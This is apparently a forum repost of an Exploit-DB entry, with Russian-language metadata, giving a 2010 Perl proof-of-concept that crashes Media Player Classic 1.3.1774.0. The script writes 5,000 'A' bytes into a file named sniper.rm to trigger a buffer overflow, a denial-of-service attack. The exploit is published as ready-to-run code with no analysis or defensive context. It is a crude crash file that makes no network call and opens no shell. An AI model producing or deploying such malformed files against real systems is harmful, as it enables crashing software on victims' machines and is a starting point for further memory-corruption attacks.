Exploit Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
12704
Проверка EDB
  1. Пройдено
Автор
SNIPER IP
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-05-23
Код:
# Exploit Title: [ Media Player Classic - v 1.3.1774.0  (.rm file)  buffer Overflow poc ]
# Date: [ 2010-05-22 ]
# Author: [ sniper ip ]
# Software Link: []
# Version: [ v 1.3.1774.0  ]
# Tested on: [ Windows  xp2 , Windows  xp3 , Windows  7 ]
# CVE : [if exists]
# Code : [

#!/usr/bin/perl
# |--------------------------------------------------------------------------------------------------| #
# | -- Media Player Classic - v 1.3.1774.0   (.rm file)  buffer Overflow poc --| #
# | ---------- -- By : sniper ip # My Email : [email protected] ------------- | #
# |--------------------------------------------------------------------------------------------------| #

$buff="A" x 5000;
open (myfile , ">>sniper.rm");
print myfile $buff;
close (myfile);
 
Источник
www.exploit-db.com

Похожие темы